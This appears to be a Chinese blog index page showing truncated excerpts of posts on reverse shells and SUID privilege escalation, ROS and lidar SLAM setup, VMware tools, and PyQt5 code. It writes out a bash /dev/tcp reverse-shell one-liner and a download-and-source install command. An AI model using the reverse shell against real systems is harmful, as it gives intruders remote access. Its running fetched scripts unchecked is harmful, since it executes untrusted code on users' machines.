反弹shell的原理:通过受害主机运行攻击者的程序,主动与攻击主机进行tcp会话,同时攻击主机处于监听状态,之后一步一步提权反弹shell:1.指令: bash -i >& /dev/tcp/ip/port 0>&1 2>&1 2.指令解析:bash -i 创建一个shell会话在介绍>&之前,先介绍以下描述符描述符 : 0 标准输入 1 标准输出 2 错误输出xx >& xx : >&后面如果是文件的话,意思就是将前面的输出传进后面的文件里 如果后面是描述符,如0>&1就是将标准输入传入到标准输出3.总结:上述指令的含义是:将本地终端的标准输出传入到远程主机(bash -i >& /dev···),之后将远程主机的标准输入传入本地终端(0>&1),执行完成后将标准输出传入到远程主机,形成一个回环find suid提权原理通过具有suid权限的可执行二进制文件可以使得权限暂时提升为root用户,在当前任务线
1.在工作空间的根目录下下载hector的源码包wget https://heiblog.top/app/hector_slam.zip unzip hector_slam.zip2.下载完成后放在工作空间的src目录下cd src mv hector_slam src3.编译cd .. catkin_make4.设置雷达的farm_id为laser(根据自己的雷达进行设置)5.运行source ./devel/setup.bash roslaunch hector_slam_launch tutorial.launch6.添加订阅map话题
在vmware-tools不是灰色的情况下,直接安装就可以了在vmware-tools是灰色的情况下,输入以下命令:sudo apt-get install open-vm-tools2.安装依赖sudo apt-get install open-vm*3.重启rebot
1.从官网下载安装包官方下载包该版本自带ros,但是自带的ros有一个问题,在root用户下ros不能正常的使用,而且普通用户在刚刷好系统后ros也不能使用,需要配置一下note:这个版本是最优的了,我试过5,6个系统,要么安装不了ros,要么安装不了驱动,反正各种错误。推荐一键配置脚本:wget http://fishros.com/install -O fishros && . fishros选择4进行一键配置(如果要换源也可以用这个)note:不配置的后果就是你输入roscore,rosdep 全部not found2.之后是安装rivz$ sudo apt-get update $ sudo apt-get install ros-noetic-rviznote:安装这个是为了可视化数据3.开始编译新建一个文件夹,并在文件夹内创建一个src文件夹,将雷达的配置文件放入mkdir ld cd ld mkdir src开始编译前需要扩大一下交换空间swap不然编译时会卡死第一步:确保系统中有足够的空间来用做swap交换空间,我准备在一个独立的文件系统中添加一个swa
思路整体布局通过Pyqt5 designed来设计按键事件(槽机制)通过将ui文件转化为py文件后加入切页操作通过实例化两个页面,再先需要显示哪个,就加载页面到主窗口中效果代码# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'untitled.ui' # # Created by: PyQt5 UI code generator 5.15.9 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): Main
admin
尽管我有着强大的技术实力,但我始终保持低调。我相信,真正的强者,不需要通过炫耀来证明自己的实力。我更愿意通过我的实际行动,来证明我是一名优秀的程序员。 我是浩哥,一名强大而低调的程序员。我在这里,期待与你们一起创造更多的可能。